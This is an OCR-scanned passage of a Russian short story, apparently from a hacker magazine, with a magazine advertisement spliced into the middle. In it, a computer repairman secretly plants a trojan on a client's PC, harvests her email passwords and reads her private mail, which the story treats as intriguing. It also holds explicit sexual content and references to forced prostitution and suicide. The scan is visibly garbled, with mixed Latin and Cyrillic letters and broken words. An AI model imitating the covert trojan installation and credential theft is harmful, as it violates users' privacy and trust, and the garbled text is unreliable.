быть, телевизора - слышалось откуда-то из 
глубин огромной квартиры), Антон, перио- 
дически поглядывая на монитор, прибли- 
зился к устройству. Его назначение было 
абсолютно непонятно. 

В основе всего располагалась довольно 
большая тумба на поворотной платформе; 
выше - несколько блоков, напоминающих 
раздельный музыкальный центр, как и пока- 
залось Вернику вначале. К музыке это, судя 
по всему, не имело никакого отношения. 

Провода проникали в каждый из блоков; 
на передних панелях тускло отражали свет 
люстры погасшие табло. Сенсорные панели 
со множеством кнопок не говорили Антону 
ни о чем, напоминая почему-то микровол- 
новку. Он осторожно провел рукой над 
кнопками, не прикасаясь к ним. 

На самом верху сооружения стоял 00- 
вольно большой монитор - жидко-крис- 
таллический; наверное, очень дорогой. На- 
именование фирмы, отметившейся на ли- 


цевой панели, было Антону неизвестно, 
что сразу же вызвало уважение - ничего 
похожего на Китай, скорее всего, какой-то 
неведомый Вернику брэнд. Вообще, все 
это вызывало ощущение медицинского 
прибора - даже цвет всей установки, осле- 
пительно белый, не имел ничего общего с 
офисной техникой. 

Увлекшись, он едва не пропустил момент, 
когда Ева вошла в комнату проверить ход 
работы - краем уха он уловил шорох пенью- 
ара и быстро вернулся поближе к компью- 
теру. Она вошла неслышно - босиком. Это 
было неожиданно, Антон машинально опус- 
тил глаза вниз и отметил красивый сверка- 
ющий лак на ухоженных ногтях. 

- Сколько мне еще ждать? - нетерпеливо 
спросила она. 

Антон развел руками и покачал головой. 

- Отменя сейчас мало что зависит, вы же 
понимаете... Около сорока минут - 90 мо- 
мента, когда вы сможете сесть за компью- 
тер, - объяснил ей перспективу Верник. 

Ева хмыкнула и внимательно посмотрела 
на Антона. 

- Ладно, я все понимаю, - угрюмо ответила 
она. - Не совсем же я дура. Устал? 

Антон замер. «Сейчас предложит рассла- 
биться, а потом скажет, что расплатилась...» 
- проскочила крамольная мысль. 

- Кофе? - тем временем спросила Ева. 
Верник, признаться, не сразу услышал ее 
вопрос. Он на пару секунд провалился куда- 
TO в свой мир, где на разных полочках CO3- 
нания хранились сведения о женщинах по- 

добного поведения. Ева повторила: 

- Кофе, мальчик? 

«Все, попал», - признался сам себе непо- 
нятно в чем Верник и молча кивнул. Ева 
щелкнула пальцами и вышла. Антон облиз- 
нул пересохшие губы - ее роскошное тело 
волновало парня все больше и больше, а 
запах духов очистился от неподходящих 
для красавицы примесей и дурил рассудок. 

Вернуться за компьютер он себя заставил. 
Опустившись в кресло, он всмотрелся в 
происходящее на экране. Полоска инстал- 
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ляции достаточно быстро ползла к финишу. 


Компьютер действительно был хорош. Если 
принять во внимание ту штуку, что стояла в 


углу, - то внутри компа находились, видимо, 


не менее крутые детали. 

- Вчем суть брэнда? - услышал он голос 
из-за спины. - Ева, как кошка, подкралась 
незаметно и опустила на подлокотник ма- 
ленькую чашку кофе, расточающую густой 
приятный аромат. - В гарантии, Антон, не 
мне вам объяснять... 

«Она что, мысли читает?» - поразился по- 
паданию собеседницы в точку Верник. 

- Согласен с вами, Ева, - кивнул Антон, не 
отрывая взгляд от ее колен - точеной, со- 
вершенной формы. - Я смотрю, вы все-таки 
достаточно подкованы - так, может, вам 
преподать несколько уроков, и вы сможете 
делать все это сами? 

Антон сказал все это и тут же поразился 
собственной наивности - зачем этой фото- 
модели какие-то уроки? Она вызовет сюда 
самого Билла - и он будет только рад пол- 
зать у ее ног, втыкая кабели вместо портов 
себе в ноздри! 

- Я подумаю, Антон. Ты пей, пей - в ма- 
леньких чашечках кофе быстро остывает. 

- Яне люблю горячий, - машинально сов- 
рал Верник. - С детства. 

Ева улыбнулась. 

- Сколько тебе лет? 

- Двадцать один. 

- Давно за компьютером? 

- Лет шесть уже, - не без гордости ответил 
АНТОН. 

- Профессионал? 

- Пока никто не жаловался, - пожал Вер- 
ник плечами. 

- Ну-ну, - покачала головой Ева и посмот- 
рела на экран. - Там, похоже, надо перезаг- 
рузиться. 

Антон оторвался от ее фигуры, которую 
лапал глазами сам того не замечая, взгля- 
нул на монитор и пощелкал «мышкой». Он 
спиной ощущал взгляд Евы; ему показа- 
лось, что она уже не так раздражена, как 
при встрече. 


- Ну вот, почти все закончено, - развел ру- 
ками Верник. - Тут еще нужно кое-что поп- 
равить... 

- Зачем? - напряглась Ева. 

- Вы же знаете, что у Майкрососрт не все 
так хорошо по умолчанию, как хотелось 
бы... Вот некоторые же рождаются с такой 
фигурой, как у вас, а многим... 

Антон замолчал. Он понял, что сделал наг- 
лый комплимент, в котором тут никто не 
нуждался. Однако реакция была достаточно 
неожиданной - Ева расплылась в улыбке и 
кокетливо наклонила голову: 

- Ох, Антон, я, конечно, не Майкрософт. У 
меня по умолчанию все очень даже ничего 
- это мне многие говорили. Ладно, настраи- 
вай, не буду тебе мешать... Своей фигурой... 
- шепнула она себе под нос, уходя, но Антон 
ее услышал, покраснел и сжал «мышку» 
так, что будь она живой - пискнула бы обя- 
зательно. Перед смертью. 

Он прошелся по реестру, системным служ- 
бам, автостарту, драйверам - при этом не ре- 
шаясь попросить Еву разрешить ему настро- 
ить ту штуку, что тревожила его кибер-соз- 
нание. Где-то за стеной заиграла музыка - 
Ева включила «Серебряный дождь». 

И вот тут-то Антона осенило. 

Он воровато оглянулся по сторонам, вслу- 
шался в тишину коридора. После чего выта- 
щил из своего «дипломата» диск с не сов- 
сем законными утилитами. Недолго думая, 
он засунул ей «трояна», почистил реестр 
еще раз и сунул диск на место. 

Спустя пару секунд в проеме арочной две- 
ри вновь появилась Ева. Опершись на сте- 
ну, она внимательно смотрела Антону в гла- 
за. Вернику стало не по себе. 

- Интересно? - Ева кивнула в сторону уста- 
новки в углу. 

Антон сделал вид, что ему все равно. Хо- 
зяйка ухмыльнулась: 

- Знаю, что интересно, - она махнула ру- 
кой куда-то вверх. Верник поднял глаза и 
увидел под потолком маленькую камеру 
видеонаблюдения. По спине пробежала 
волна холода. 
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«Она видела, как я доставал диск... Но 
ведь она не может знать, для чего», - тут же 
успокоил себя Антон и проглотил тугой ко- 
MOK СЛЮНЫ. 

- Твоя новая Windows - надежнее? - спро- 
сила Ева. Антону показалось, что она нем- 
ного под хмельком. 

- Да, - ответил он. - И это не только мое 
мнение. Оно достаточно объективное... 

- Кофе допил? - короткий, но очень крас- 
норечивый вопрос. 

- Допил, - Антон поднялся с кресла и при- 
нялся собираться. - Я вызову такси? - кив- 
нул он в сторону телефонной трубки, вися- 
щей на стене. Ева согласно прикрыла глаза, 
демонстрируя великолепные ресницы. 

Такси прибыло через пять минут. Антон 
вышел в прихожую, обулся и повернулся к 
хозяйке. Та протянула ему несколько купюр 
- точно по ночному тарифу. 

- Спасибо, Антон. И не смотри на меня так - 
я и так практически раздета, так ты с меня 
последнее снимаешь. 

Верник смутился и, пятясь и спотыкаясь, 
спиной вперед вышел на площадке. Дверь 
захлопнулась. Антон взглянул на нее, слов- 
но пытаясь запомнить на всю жизнь. 

- Скоро она настроит свою иноземную ба- 
лалайку... Надо поторопиться домой. 

Внизу, у подъезда, уже сигналил таксист, 
уставший, как всегда, ждать... 


ж*жх 


Ева прошла в комнату и опустилась в 
кресло, которое еще хранило тепло Антона. 
Положив руки на подлокотники, она чуть не 
смахнула чашку с недопитым кофе. Взяла 
ее в руку, понюхала - аромат стал послабее, 
кофе уже остыл. Осторожно опустила чаш- 
ку на пол рядом с креслом, взглянула на 
экран. 

Новая операционная система была явно 
попривлекательнее внешне - но кому, ес- 
ли не Еве, знать, что внешность порой об- 
манчива... 

- Если иты мне выкинешь нечто вроде се- 
годняшней шутки... - погрозила она кулаком 
монитору. - Тогда моим планам будет не 
суждено осуществиться - а этого никак 
нельзя допустить. 

Сходив в другую комнату, она взяла из су- 
мочки кредитную карточку, подключилась к 
Интернету, выполнила небольшую финан- 
совую операцию, после чего взяла с компь- 
ютерной стойки один из дисков - непримет- 
ный, неподписанный. Но ей не нужны были 
никакие опознавательные знаки; этот диск 
она нашла бы в полной темноте среди сотен 
похожих... 

Вставила его в дисковод, запустила уста- 
новку программы. Внезапно ожил прибор в 
углу - прогудел низким, басовитым звуком, 
засветился голубым экраном, заблестел 
сенсорами, подсвеченными изнутри. И, OT- 
зываясь на привычный звук, напряглись и 
стали каменными соски ее не знавших ре- 
бенка грудей... 

На скулах заходили желваки. Она ненави- 
дела этот чертов рефлекс, но зависела от 
него, как наркоманка. Да и какая женщина 
в ее возрасте не думает о сексе! Но у Евы о 
плотских утехах были несколько иные 
представления... 

Она встала, скинула пеньюар и осталась 
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полностью нагой. Блики красноватого све- 
та играли на ее коже; она вышла в кори- 
дор к огромному, go потолка, зеркалу и 
невольно залюбовалась собой. Все было 
на месте и в достаточном объеме и коли- 
честве; длинные волосы падали на ее пле- 
чи, ни единой морщины на ухоженном те- 
ле, втянутый животик («Осталось пятно от 
присоски!»), округлые бедра... Девяносто- 
шестьдесят-девяносто. 

- Как я все это вытерпела? - спросила она 
себя. - Четыре года... Даже больше. Почти 
пять. Кто ответит на этот вопрос? И вообще - 
кто за это все ответит? 

Она провела пальцами по зеркалу, очер- 
чивая контур отражения своего лица. Прош- 
ла на большую светлую кухню, взяла недо- 
питый фужер шампанского и пригубила са- 
мую малость. Потом покрутила искрящуюся 
жидкость в руке и залпом допила. 

- Как сейчас помню - у Дика всегда полу- 
чалось лучше после принятия спиртного... 

Она наполнила фужер снова до краев, пе- 
на хлынула на стол. Ева выпила еще, по- 
морщилась - пузырьки ударили в нос, зас- 
тавили выступить слезы на глазах. 

Когда бутылка оказалась наполовину пус- 
та, Ева со звоном опустила бокал на барную 
стойку. 

- Пора, - сказала она сама себе; ее нелов- 
ко качнуло, она ухватилась за край стола. - 
Алкоголь всегда усиливал желание... 

Она вернулась в кресло. На этот раз села 
достаточно тяжело, безо всякого изящества 
- ноги уже держали довольно плохо. Ева 
вдохнула - глубоко, через HOC; ее всегда 
возбуждал запах собственного тела. 

- Стоит начать? - дурашливо спросила она 
у самой себя. - Само собой... 

Она послюнявила кончик среднего паль- 
ца правой руки и опустила его между ног. 
Через несколько минут она поняла, что за- 
была подключить электроды. Прервавшись 
с сожалением, граничащим с безумием, она 
приподнялась с кресла, прилепила над лоб- 
ком присоску, щелкнула у основания крес- 
ла тумблером, включив «ноль», и с увлече- 
нием продолжила свое занятие. 

Вновь, как всегда, из полуоткрытого рта 
раздавались протяжные стоны, достойные 
саундтрека к порнофильму; тело периоди- 
чески сотрясали судороги; тонус разгибате- 
лей заставлял шею гнуться назад, пальцы 
свободной руки были распрямлены и даже 
больше - разогнуты чуть ли не в дугу, что 
говорило о максимальном возбуждении. 
Кресло заблестело от пота; каким-то краеш- 
ком охваченного наступающим оргазмом 
сознания она помнила о цели всего проис- 
ходящего, рука протянулась к клавиатуре... 

В прошлый раз на этом месте система за- 
висла. Сейчас этого не произошло - честь и 
хвала корпорации Билли! Нажатие клавиши 
«Enter» было корректно обработано и сов- 
пало с криком, сорвавшимся с губ... 

Устройство на другом конце провода, иду- 
щего от тела Евы в комп, а оттуда к одному 
из блоков на белой тумбе, издало тонень- 
кий писк, на экране пробежали строки слу- 
жебной информации; Ева застонала долго, 
протяжно, постепенно затихая. Из верхнего 
блока, на котором было меньше всего ка- 
ких-либо кнопок, выехал лоток со сверкаю- 
щим золотом диском. 


«Record is completed, ready to use. Superb, 
baby!» 

Эту фразу придумал Дик - «Великолепно, 
детка!» Он всегда грешил заморским язы- 
ком, несмотря на то, что эта штука, которую 
он придумал, прекрасно понимала русскую 
речь - в смысле, буквы. 

Ева стерла пот со лба. Разлепила веки, 
словно чугунные после вспышки страсти, 
посмотрела на эту строчку на экране, нес- 
колько раз кивнула головой и задремала, 
забыв отключить электрод. 

Диск, ненадолго забытый, лежал, посвер- 
кивая, в лотке. На его дорожках, с плот- 
ностью до шестисот на одном миллиметре, 
был сейчас записан оргазм Евы - во всех 
подробностях, начиная с частоты пульса и 
заканчивая эмоциональным пиком в наи- 
высший момент наслаждения. Семьсот ме- 
габайт чистого кайфа. Золотая матрица 
(Дик никогда не доверял другим). Экстаз, 
увековеченный лазером. Любовь и нена- 
висть, страсть и порок, стоны, крики и ше- 
пот, бред и великая истина. Океан чувств. 
Море любви. 

И НИКТО В МИРЕ ЕЩЕ НЕ ЗНАЛ, ЧТО OP- 
ГАЗМ МОЖЕТ СТАТЬ ФАЙЛОМ. 

Ева тихо дремала в кресле, свернувшись 
калачиком, не замечая во сне прохлады и 
своей наготы. Ей снился Антон, мастер из 
«Компьютерной скорой помощи». OH пил с 
ней шампанское, закусывал «Рафаэлками», 
рассыпая кокосовые стружки по полу, и 
убеждал, что Windows ХР - самая лучшая 
поза в «Камасутре»... 
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Антон вернулся домой через полчаса пос- 
ле работы у Евы - такси задержали на 00- 
ном из постов ГИБДД для проверки багаж- 
ника. Опять кого-то застрелили среди этого 
праздника жизни, искали киллера; Антон 
даже не заметил остановки, молча протя- 
нул документы в окно «Волги» (без паспор- 
та в Москве было сложно шаг ступить уже 
много лет). Пока ДПС-ник просматривал во- 
дительские права, паспорт пассажира и заг- 
лядывал в багажник, у Верника из головы 
не шла Ева. 

Там было что-то не очень хорошее; прямо 
скажем, ее непонятная установка тянула на 
криминал. Сейчас, уже покинув ее квартиру, 
он вспоминал некоторые детали, там не 
бросившиеся в глаза по причине своей 
обыденности. Пара «Плейбоев», лежащих 
под компьютерным столом; несколько то- 
неньких книг по психологии (названия не 
отложились в голове у Антона, но суть он 
схватил верно - слово «психология» в них 
встречалось практически в каждой). Учеб- 
ник по работе в Интернете; бездарный по 
сути, но все-таки необходимый людям, ни- 
чего в этом не понимающим, по крайней 
мере на первых порах. И фотография муж- 
чины на стене за установкой - ее было пло- 
хо видно, потому что монитор скрывал фото 
наполовину; изучая прибор, Антон как-то не 
обратил на нее внимания. Сейчас же он пы- 
тался вспомнить лицо, изображенное на 
ней, - достаточно волевой взгляд, острые 
скулы, пронзительные глаза. Человек на 
фотографии, по-видимому, улыбаться не 
любил принципиально. Тип лица нельзя 
было отнести ни к европейскому, ни к азиа- 


TCKOMY - какое-то «сделанное» лицо, искус- 
ственное, что ли. Да, пожалуй, именно это 
слово и подходило к нему больше всего. 

Антон на секунду отвлекся от воспомина- 
ний, выглянул в окно. Ночная Москва почему- 
то произвела на него после розового пеньюа- 
ра Евы гнетущее впечатление. Захотелось как 
можно быстрее оказаться дома, принять душ 
и войти в Сеть. Вполне возможно, информа- 
ция, которую ему мог отправить троян, уже 
лежала на почтовом сервере - оставалось 
только получить ее и обработать. 

Тем временем досмотр закончился. Таксист 
вернулся на свое место, машина тронулась. 
Верник немного укачался, задремал. Сон, то 
ли беспокойный, то ли тяжелый, одолел его. 
Красные тона окружили его в этом сне, пов- 
лекли за собой; он обнимал Еву, ощущая под 
пальцами нежную ткань ее призрачной 
одежды. Глаза загадочной женщины пронзи- 
тельно смотрели ему в душу, руки отталкива- 
ли. Антон понимал, что женщина с ним игра- 
ет, заставляя распаляться все больше и боль- 
ше. Тряхнув волосами, она отбежала на нес- 
колько шагов, позвала за собой - беззвучно, 
одними губами. Антон шагнул следом... 

- Приехали, парень, - над ухом прозвучал 
голос таксиста. - Сто двадцать рублей, как go- 
говаривались. 

Верник встряхнулся и смущенно взгромоз- 
gun себе на колени «дипломат» - его недю- 
жинная молодецкая эрекция, навеянная эро- 
тическим сном, бросалась в глаза даже нев- 
нимательному зрителю. Отсчитав деньги, он 
аккуратно выбрался из машины, продолжая 
прикрываться «дипломатом». 

Поднявшись к себе домой, он позвонил дис- 
петчеру. Лукашин, уже вернувшийся с вызо- 
ва, который оказался какой-то бездарной ме- 
лочевкой, отметил время прибытия Верника и 
пожелал ему спокойной ночи. 

- Да ну тебя, - отмахнулся от него Антон. - 
Столько времени проторчал там, думал, жи- 
вым не уйду. 

- Что, приставала? 

- Лучше бы приставала, - мрачно произнес 
Антон. Виталий не понял: 

- Объясни популярно, как так бывает. Мы тут 
люди серые, по бабам не ездим, все дети без- 
дарные попадаются, любители игрушек и дерь- 
меца порнографического. Я вот сегодня по 
просьбе одной мамы вычистил с винта у три- 
надцатилетнего оболтуса шесть с полтиной ги- 
габайт порнухи всякого рода - и фотки, и кли- 
пы, и игрушки... Даже пара мультиков. Если ты 
хочешь... Я себе много чего успел скинуть, у 
меня же на ноутбуке винчестер огромный. Как 
раз для таких случаев. Ну, так ты будешь рас- 
сказывать? - сам себе прервал Лукашин и за- 
молчал в надежде на сальную историю. 

Антон не был расположен к подобного рода 
обсуждениям; тем более, разменивать свои 
впечатления от Евы на мнения какого-то бе- 
зумца Лукашина, любителя продукции «детям 
go шестнадцати», ему не хотелось. Он долго 
молчал, потом пробурчал что-то на тему уста- 
лости и желания выспаться. 

Лукашин, как ни странно, понял. 

- Ладно, чего там... Спи. Директор дал тебе 
на завтра выходной... 

- В смысле? - невольно напрягся Антон, 
ожидая очередного подвоха, хотя до первого 
апреля было еще очень далеко. 

- «В смысле...» - передразнил Лукашин. - 


Сколько тебе эта баба отвалила за работу? 

- Шестьсот... - нащупал в кармане брюк 
деньги Антон. - Шестьсот пятьдесят. Тариф- 
то ночной... Завтра заеду, отчитаюсь в бух- 
галтерии. 

- Сколько? - снисходительно сказал Вита- 
лий. - Шестьсот пятьдесят? Она потом двести 
долларов перевела на наш счет, да еще пись- 
мо с благодарностью для тебя накатала! 

Антон едва не уронил телефон. Там точно 
было что-то не так. 

- Двести баксов? - переспросил он. - И чем 
же она это объяснила? 

- Тобой, уважаемый, - сухо ответил Лука- 
шин. - И, я думаю, директор не поверит, что у 
тебя с ней ничего не было. Понимаешь... Если 
ты говоришь правду, а мне, можешь пове- 
рить, все равно, то она тебя подставила. Хотя, 
вероятно, она хотела как лучше... 

Верник молча нажал «отбой». Повертев 
трубку в руке, он швырнул ее на диван. Ох, 
уж эта EBal.. 

Честно говоря, он ее не понял. Его работа 
явно не стоила двести долларов. Даже те 
деньги, что она заплатила лично ему - даже 
их, по большому счету, было много. Оправ- 
данием сумме служило позднее время и ус- 
тановка лицензионной версии системы. А 
вот чтобы расстаться с той суммой, что она 
перевела на их счет после его ухода, - для 
этого надо было иметь веские основания. 
Верник задумался, причем задумался 
всерьез и надолго. 

Чем больше он размышлял над этим воп- 
росом (пробираясь сквозь туманные красоч- 
ные образы Евы, периодически всплываю- 
щие прямо у него перед носом), тем ближе 
становилась ему мысль о том, что дело в той 
штуке с телевизором, соединенной с компом 
парой проводов. Он вспомнил лежащую на 
полу у компьютерного стола присоску с 
электродом; эта таинственная фотомодель 
проводила эксперименты явно не над лягуш- 
ками и собаками... 

- А какого черта я сижу?!. - вдруг спросил он 
самого себя вслух. - Ведь вопросы решаются 
только тогда, когда на них действительно ищут 
ответы! Хватит теряться в догадках - моя троя- 
нская лошадка прояснит эту ситуацию. 

Вытащив из «дипломата» ноутбук, Антон 
расположил его на диване рядом с собой, 
воткнул в порт «Зухель», соединил кабелем 
с телефонным гнездом, включил. Экран зас- 
ветился, загрузка была очень и очень быст- 
рой - директор не скупился на оборудование 
для своих сотрудников, стремясь иметь все 
самое совершенное и максимально произ- 
водительное. 

Через три минуты он уже имел на своем 
компьютере адреса и пароли четырех почто- 
вых ящиков Евы. 

- Многовато, конечно, - пробурчал Антон, 
устраиваясь поудобнее и вспоминая все свои 
навыки, которыми он не пользовался - прин- 
ципиально - уже около года. - Сначала полу- 
чим все, что у нее там накопилось, а потом 
будем думать дальше. 

Почты набралось достаточно - около двад- 
цати писем, из которых только три были рек- 
ламным мусором, а все остальные содержа- 
ли хоть какую-то информацию, касающуюся 
непосредственно Евы. 

На одном из почтовых серверов Cogep- 
жались семь писем от некоей Марго, ко- 


B ПРОДАЖЕ 
с 22 ИЮЛЯ 


ГИ 
AME 
mrt 


LY OR TASH UN TET 


ey. A 


По матери! Главная 
железка в твоем компьютере 


— Обзор современных 
материнских плат 


Супервидео? Легко! 


— Создание и просмотр SVCD 
дисков 


Операция “Sundevil” 


— Самая масштабная операция 
ФБР против хакеров 


Искусственный интеллект 


— Грозитли нам восстание 
машин? 


Промышленный шпионаж 


— Как зарабатывают деньги 


Кардинг под другим углом 


— Можно ли подделать кредитную 
карту? 


Клавиатурная снифалка на С++ 


— Пишем свой keylogger 


На диске ты найдешь весь 
софт из журнала, отборные 
хакерские проги, новые 
драйвера под Windows и *nix, 
демки-победители Paradigmus 
и многое другое... 


a | м ур H А A 
ne 
igameyiang 


www.xakep.ru 


СТОРИ/МОРЕ ЛЮБВИ 


ОСи 4work 


торая посылала их с завидным постоян- 
ством - каждый день в течение послед- 
ней недели. Вполне возможно, что пись- 
ма отправлялись планировщиком, так 
как текст они содержали один и тот же, 
время отправления совпадало с точ- 
ностью 90 секунды. 

- «Ева, Дик нашелся. Он в Киеве. Узнаю 
адрес - сообщу. Я с тобой. Марго», - прочи- 
тал Антон. И так каждый день. А адрес-то 
она, похоже, так и не узнала. 

Эти однотипные письма-близнецы поче- 
му-то привлекли внимание Верника своими 
подписями. «Марго» - это было точно так же 
необычно, как и «Ева». Когда он просмот- 
рел оставшиеся восемь писем в других 
ящиках, то еще больше убедился в том, что 
его подозрения небеспочвенны - три из них 
были подписаны «Клеопатрой», два - «Мэ- 
рилин», а три последних содержали ники 
«Шарлиз», «Джина» и - самый необычный - 
«Ночной снайпер». 

Все это напоминало прозвища людей, 
принадлежащих к какой-то загадочной ор- 
ганизации. Судя по всему, они были объе- 
динены общим секретом, общим действую- 
щим лицом - Диком, который упоминался 
во всех письмах, кроме последнего от «Ноч- 
ного снайпера». 

- «Ева, будь осторожна. Ради меня. Все эти 
эксперименты ни gO чего хорошего не дове- 
дут тебя. Но - благословляю. Ночной Снай- 
пер», - трижды прочитал вслух это письмо 
Антон, пробуя его на вкус. Кто-то позаим- 
ствовал ник у известной рок-команды, 
трансформировав его в единственное чис- 
ло. Верник пытался понять, сколько среди 
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пишущих людей лиц женского пола - ведь 

ник в Интернете еще ничего не значит. При- 
шел к выводу, что все могут быть и женщи- 
нами, и мужчинами; хотя на мужчину боль- 
ше всего тянул неведомый «Снайпер». 

Еще одно письмо привлекло внимание 
Антона - оно было написано «Клеопатрой» 
четыре дня назад и содержало всего три 
слова: «А вдруг получится?». Что именно 
должно было получиться у Евы такого, о 
чем переживали все ее друзья и подруги? 

Вопросов накопилось намного больше, 
чем ответов. Вывод был пока только один - 
знакомая Антону Ева принадлежала к неко- 
ей группе единомышленников (Верник поче- 
му-то сразу стал грешить именно на органи- 
зованность), занятой решением проблемы, 
которую перед ними поставил человек с ни- 
ком «Дик», живущий в данный момент в Ки- 
еве. Больше пока выцарапать из переписки 
Антону ничего не удалось - вообще, ему 
здорово помогло то, что Ева не удаляла поч- 
Ту на серверах, а оставляла ее там хранить- 
ся в течение как минимум недели. А ведь он 
мог наткнуться на пустые ящики, информа- 
ция с которых давно превратилась в нули... 

Верник сходил на кухню, приготовил себе 
яичницу с помидорами, вывалил ее на боль- 
шую тарелку (никогда не мог есть со сково- 
роды), вернулся назад на диван и принялся 
с аппетитом есть, выставив таймер на про- 
верку ящиков Евы каждые десять минут. Он 
очень надеялся на свой троян, который был 
обязан все письма, исходящие с компа Евы, 
дублировать и отправлять клон ему домой. 

В течение часа не происходило ничего. 
Антон заснул с тарелкой недоеденной яич- 
ницы в руках. Потом пришло письмо от 
«Шарлиз». Звоночек, известивший о прихо- 
де почты, вывел Антона из дремотного сос- 
тояния. 

- «Какие планы? Я с тобой. Ты обещала 
сегодня. OT меня - и от нас - что-нибудь 
нужно?» 

Она обещала сегодня... Что она обещала? 
- спросил сам у себя и у неизвестной «Шар- 
лиз» Антон. - Сегодня... Сегодня... Сегодня! - 
осенило его. Поэтому она и заплатила та- 
кую кучу бабок! Сегодня она что-то должна 
была сделать - что-то, что без компьютера 
нельзя было выполнить ну никак! 

Антон вспомнил, как Лукашин рассказы- 
вал ему о звонке Евы. «Не-сей-час!» - кри- 
чала она в телефонную трубку, видимо пло- 
хо соображая, что разговаривает с диспет- 
чером. Что-то очень и очень важное могло 
сорваться, не появись у нее в полночь Вер- 
НИК И не наладь OH на компьютере операци- 
онную систему. 

- Компьютер был нужен для управления 
установкой неизвестного назначения, - сам 
себе констатировал факт Верник. - Насмот- 
ревшись голливудских блокбастеров, я уже 
готов поверить в то, что она при помощи 
этой штуки навела на голову Дика спутник! 

Бибикнул ноутбук. Письмо. От «Марго». 
Время другое. Размер - побольше раза в 
два. Что-то новенькое. 

- Интересно-интересно, - прошептал Антон 
и раскрыл письмо. 

- «Я помню твои способности, Ева. Вчера 
мне сделали предложение - наверное, я 
выйду замуж. Не хотелось бы тащить в бу- 
дущее груз воспоминаний. Передай от нас 


всех Дику привет, да погорячее. Его адрес - 
shine_on_your_crazy_diamonds@mail.ua. Твоя 
Марго» 

Антон прочитал письмо и закрыл глаза. 

- Что же такое должно произойти?! - спро- 
сил он у Евы, которая так и стояла все это 
время у него перед глазами. - Какой привет? 

И в это время почтовый диспетчер «Мы- 
ши» сообщил о появлении на сервере двух 
писем от Евы. Письма, которые она отправи- 
ла на адрес «сумасшедших алмазов». Пись- 
ма Дику. 

Антон смотрел на строку в диспетчере со- 
общений, читал адрес Евы, потом свой, по- 
том заголовок, и что-то не давало ему покоя. 
Что-то, что скрывалось за краем окошка. 

Причиной, вызвавшей раздражение Ан- 
тона, оказалось время, ушедшее на прод- 
вижение второго письма с компа Евы на 
его собственный. Даже если учесть необ- 
ходимый для сортировки на сервере вре- 
менной промежуток - получалось все рав- 
но очень много, около десяти минут. 
Прежде чем получить письмо, Верник 
прокрутил строку. И просто обалдел - раз- 
мер вложения, прицепленного к письму, 
составил семьсот мегабайт. 

- Она что, кино ему послала?! - искренне 
удивился он, поняв, что получить такой 
объем по модему просто нереально. А про- 
читать письмо очень и очень хотелось. Сми- 
рившись с тем, что второе письмо недоступ- 
но, он открыл первое. 

«Привет, Дик, - начал читать Антон. - Ка- 
ким ветром тебя занесло туда, где ты сей- 
час? Работаешь? Отдыхаешь? Попробуй уга- 
дать, с кем ты сейчас имеешь дело? Чтобы 
облегчить тебе задачу, подскажу - с кем-то 
из семи? А ведь когда-то, ты должен это 
помнить, нас было двенадцать. Двенадцать 
молодых, наивных девчонок, приехавших 
покорять Москву. Пятеро остались на ее 
кладбищах навсегда. Я помню тебя, четыре 
C половиной roga назад соблазнившего нас, 
дурочек с периферии, большими бабками. 
И знаешь, я благодарна тебе. Не знаю, что 
думают об этом Марго или Джина - скорее 
всего, они со мной не согласятся. Особенно 
Ночной Снайпер - та вообще готова была... 
Чтобы ты знал - это я вытащила ее из петли, 
я вызвала тогда «Скорую», это былая - Ева 
Браун. Никогда не могла понять твоей страс- 
ти кидиотским именам - что Клеопатра, что 
Мерилин. А уж несчастная Жасмин - пом- 
нишь, та, которая проглотила какую-то га- 
дость, что расплавила ей живот?.. А ведь ее 
звали просто - Жанна. Из Коломны. Ей было 
двадцать два. Интересно, ты еще читаешь 
или мое письмо уже ушло в «Trash»? Меня 
ты сделал Евой Браун, женой фюрера. Иног- 
да я забывала, что Екатерина Беляева - это 
тоже я. Обычная девчонка из Самары, став- 
шая по твоей инициативе элитной прости- 
Туткой... 

Я думаю, что я смогла бы все это вынести 
- ради денег. Вообще, ради денег можно 
сделать и стерпеть очень и очень много; это 
я говорю спустя много лет после того, как 
прибыла в Москву на поезде с парой сотен 
рублей в кошельке. Но то, что ты сделал с 
нами - с Лизой Крапивиной (язык не пово- 
рачивался никогда назвать ее Шарлиз - 
просто Лизка, и все), с остальными... 

Твой метод работы свел с ума пятерых из 


нас. Остальные получили душевные травмы, 
которые не залечит время. Эта электронная 
гадина, которая стоит у меня в углу комнаты, 
доставшись мне в наследство, периодически 
навевает всякие мысли. Знаешь, я научилась 
с нею работать. Я с нею подружилась - и поня- 
ла, почему ты так любил эти дурацкие клички. 
Ее я назвала Барби - чтобы проникнуться иди- 
отизмом ситуации, как это делал ты, внушая 
нам, что мы являемся частью великой идеи, 
частью твоего грандиозного плана. 

«Мститель» - так ты себя называл? Пригла- 
шал к нам сильных мира сего, подключал нас 
к этой проклятой Барби и записывал их эмо- 
ции на болванки. А потом, когда они приходи- 
ли снова, в момент оргазма усиливал его в 
несколько раз - GO такой степени, что люди 
сходили с ума. Я никогда не забуду безумные 
лица мужчин, чьих имен я не знала, чьих су- 
ge6 не Begana. Просто с некоторых пор я не 
занимаюсь сексом ни с кем, кроме себя са- 
мой. Я - это единственный человек, которого я 
точно не смогу сделать шизофреником.. 

Хотя... Ты знаешь, сегодня я узнала, что одну 
из нас посетило, наконец, обыкновенное чело- 
веческое счастье - она (не буду говорить кто, 
чтобы ты не мог излить свою злобу, способ- 
ную материализоваться) выходит замух. И Og- 
новременно со мной произошло нечто подоб- 
ное - сегодня в моей квартире был мужчина, 
взгляд которого запал мне в душу. Он не имел 
ко мне никакого отношения лично, обыкновен- 
ный мастер из компьютерного сервиса, но тем 
не менее - за последний год, что тебя нет в 
Москве после разоблачения суперпубличного 
дома, это первый раз, когда я обратила внима- 
ние на лицо противоположного пола. 

Я хочу закрыть эту тему раз и навсегда. Я то- 
же готова забыть обо всем - но меня гнетет 
груз, что хранится на дне самого нижнего ящи- 
ка моего трюмо в спальне. Твои диски. Наша 
любовь. Море любви. Я хочу вернуть их тебе. 

Я сделала избранное - самые эмоциональ- 
ные выдержки из наших экстазов. Последний 
- мой. Хочу, чтобы они были у тебя. Пока не 
знаю, зачем. Просто эта мысль давно уже 
гложет меня - отправить тебе твое оружие... 

C их помощью ты ничего не сможешь сде- 
лать, ведь Барби стоит у меня в комнате, а HO- 
вого адреса Евы Браун ты не знаешь - но они 
будут тебе напоминать о тех пятерых, что не 
вынесли испытания, и о семерых, что могут 
тебя достать и заставить пройти через то, что 
прошли твои жертвы. Я уверена - ты не пожа- 
леешь ни времени, ни денег и получишь этот 
файл. Успехов тебе, Дик. Помни о нас». 

Антон ошалело смотрел в экран. Текст пись- 
